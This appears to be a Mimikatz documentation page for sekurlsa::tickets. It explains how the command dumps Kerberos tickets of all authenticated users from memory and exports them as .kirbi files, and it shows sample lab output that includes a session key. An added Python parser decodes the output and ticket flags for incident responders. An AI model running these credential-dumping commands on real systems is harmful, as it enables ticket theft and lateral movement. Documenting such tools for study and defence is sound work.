tickets
sekurlsa::tickets lists Kerberos tickets belonging to all authenticated users on the target server/workstation. Unlike kerberos::list, sekurlsa reads the tickets from memory and is not subject to key export restrictions. Sekurlsa can also access the tickets of other sessions (users). It has the following command line argument:
  • /export: tickets are exported to .kirbi files. The file names start with the user's LUID and group number (0 = TGS, 1 = client ticket(?) and 2 = TGT). The tickets are saved in the current directory.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
mimikatz # sekurlsa::tickets

Authentication Id : 0 ; 697146 (00000000:000aa33a)
Session : Service from 0
User Name : MediaAdmin$
Domain : hacklab
Logon Server : DC
Logon Time : 10/17/2021 4:22:01 AM
SID : S-1-5-21-2725560159-1428537199-2260736313-1427

* Username : MediaAdmin$
* Domain : HACKLAB.LOCAL
* Password : (null)

Group 0 - Ticket Granting Service

Group 1 - Client Ticket ?

Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 10/17/2021 4:22:01 AM ; 10/17/2021 2:22:01 PM ; 10/24/2021 4:22:01 AM
Service Name (02) : krbtgt ; HACKLAB.LOCAL ; @ HACKLAB.LOCAL
Target Name (02) : krbtgt ; hacklab.local ; @ HACKLAB.LOCAL
Client Name (01) : MediaAdmin$ ; @ HACKLAB.LOCAL ( hacklab.local )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
1351322f734539c08a78792f642fc4fd4ff8aea1fe3b4a0edf83778b5ed878e9
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
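When output like the above is recovered during incident response, the fields that matter are which principal's ticket was exposed and how long it stays valid or renewable. The following is an added example, not part of Mimikatz or the original page: it parses such output into records and decodes the flags value. The function names are illustrative, and it assumes the US-style timestamps shown above.

```python
import re
from datetime import datetime

# RFC 4120 ticket flag bits, using the names mimikatz prints on this page.
FLAGS = {0x40000000: "forwardable", 0x20000000: "forwarded", 0x10000000: "proxiable",
         0x08000000: "proxy", 0x04000000: "may_postdate", 0x02000000: "postdated",
         0x01000000: "invalid", 0x00800000: "renewable", 0x00400000: "initial",
         0x00200000: "pre_authent", 0x00100000: "hw_authent",
         0x00040000: "ok_as_delegate", 0x00010000: "name_canonicalize"}

# Sample input: lines taken from the output on this page (key material left out).
SAMPLE = """\
Authentication Id : 0 ; 697146 (00000000:000aa33a)
User Name : MediaAdmin$
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 10/17/2021 4:22:01 AM ; 10/17/2021 2:22:01 PM ; 10/24/2021 4:22:01 AM
Service Name (02) : krbtgt ; HACKLAB.LOCAL ; @ HACKLAB.LOCAL
Client Name (01) : MediaAdmin$ ; @ HACKLAB.LOCAL ( hacklab.local )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
"""

def decode_flags(value):
    """Return the sorted names of the flag bits set in a 32-bit flags value."""
    return sorted(name for bit, name in FLAGS.items() if value & bit)

def exposed_tickets(text):
    """Return one record per ticket found in sekurlsa::tickets output."""
    out, luid, group, cur = [], None, None, None
    ts = lambda s: datetime.strptime(s.strip(), "%m/%d/%Y %I:%M:%S %p")
    for line in text.splitlines():
        line = line.strip()
        if m := re.match(r"Authentication Id\s*:.*\(([0-9a-f]+:[0-9a-f]+)\)", line):
            luid = m.group(1)          # logon session the tickets belong to
        elif m := re.match(r"Group (\d) -", line):
            group = int(m.group(1))    # 0 = TGS, 1 = client ticket, 2 = TGT
        elif m := re.match(r"Start/End/MaxRenew\s*:(.*);(.*);(.*)", line):
            cur = {"luid": luid, "group": group, "end": ts(m.group(2)),
                   "renew_until": ts(m.group(3))}
            out.append(cur)            # each Start/End line opens a new ticket
        elif cur and (m := re.match(r"(Service|Client) Name\s*\(\d+\)\s*:\s*([^;]+);", line)):
            cur[m.group(1).lower()] = m.group(2).strip()
        elif cur and (m := re.match(r"Flags ([0-9a-f]{8})", line)):
            cur["flags"] = decode_flags(int(m.group(1), 16))
    return out
```

For the ticket above, the record shows a renewable TGT for MediaAdmin$ whose `renew_until` is a week after issue, which is the window responders need to close.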
Last modified 6mo ago